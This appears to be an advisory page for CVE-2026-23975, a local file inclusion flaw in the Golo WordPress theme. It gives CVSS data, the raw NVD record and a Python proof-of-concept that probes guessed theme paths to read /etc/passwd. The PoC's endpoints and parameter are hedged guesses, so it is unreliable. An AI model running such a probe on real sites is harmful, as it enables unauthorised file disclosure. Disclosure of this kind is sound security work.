Security Vulnerability Report
中文
CVE-2026-23975 CVSS 7.5 HIGH

CVE-2026-23975

Published: 2026-01-22 17:16:38
Last Modified: 2026-04-28 16:16:08

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in uxper Golo golo allows PHP Local File Inclusion.This issue affects Golo: from n/a through < 1.7.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Golo < 1.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-23975 PoC - Local File Inclusion in Golo Theme # Target: WordPress site with vulnerable Golo theme < 1.7.5 target = "http://target-site.com" # PoC for reading /etc/passwd payload = "/etc/passwd" # Common vulnerable endpoints in Golo theme vulnerable_paths = [ "/wp-content/themes/golo/framework/plugin.php", "/wp-content/themes/golo/inc/functions.php", "/wp-content/themes/golo/ajax.php" ] for path in vulnerable_paths: url = target + path params = { "file": payload # or "template", "include", etc. } try: response = requests.get(url, params=params, timeout=10) if "root:" in response.text or "bin:" in response.text: print(f"[+] Vulnerable endpoint found: {url}") print(f"[+] Content preview:\n{response.text[:500]}") except requests.RequestException as e: print(f"[-] Error testing {url}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23975", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:38.210", "lastModified": "2026-04-28T16:16:08.027", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in uxper Golo golo allows PHP Local File Inclusion.This issue affects Golo: from n/a through < 1.7.5."}, {"lang": "es", "value": "Vulnerabilidad de Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('PHP inclusión remota de ficheros') en uxper Golo golo permite PHP inclusión local de ficheros. Este problema afecta a Golo: desde n/a hasta &lt; 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}